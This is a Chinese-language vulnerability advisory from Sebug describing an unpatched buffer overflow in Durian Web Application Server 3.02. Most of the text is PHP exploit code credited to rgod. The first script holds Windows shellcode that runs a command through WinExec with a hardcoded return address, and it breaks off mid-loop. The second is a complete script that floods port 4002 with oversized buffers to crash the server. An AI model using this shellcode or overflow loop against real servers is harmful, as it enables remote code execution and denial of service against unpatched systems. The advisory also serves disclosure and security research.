系统编号:BES2006121074
发布时间:2006-12-29
入库时间:2006-12-31
危害级别:★★★★★★
影响版本:
Durian Web Application Server 3.02
详细说明:
Durian是一款免费的Web应用服务器,用于以APS或DWS语言生成交互的动态Web内容。
Durian在处理恶意畸形请求时存在缓冲区溢出漏洞,远程攻击者可以利用此漏洞导致拒绝服务或执行任意指令。
参考:
rgod (rgod@autistici.org)
解决方案:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/durian/
测试方法:
[警 告]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
http://sourceforge.net/projects/durian/
*/
error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";
$shellcode =
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"cmd.exe /c start notepad & ";
//$eip="\x72\xe0\xf1\x00";//DEP disabled
$eip="\x72\xe0\xf2\x00";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
for ($j=0; $j
==============================================================================================
http://sourceforge.net/projects/durian/
//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org
error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;
for ($m=1; $m<=$c; $m++){ for ($j=0; $j<3; $j++){ for ($i=0; $i<8; $i++){ $junk=""; for ($k=1; $k<=$size[$i]; $k++){ $junk.=$ch[$j]; } echo "buf size:".$size[$i]."|char:".$ch[$j]."\n"; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket < 0) { die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"); } $result = socket_connect($socket, $address, $service_port); if ($result < 0) { die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n"); } $in = $junk; socket_write($socket, $in, strlen ($in)); socket_close($socket); } } sleep(1); } ?>
//Sebug.net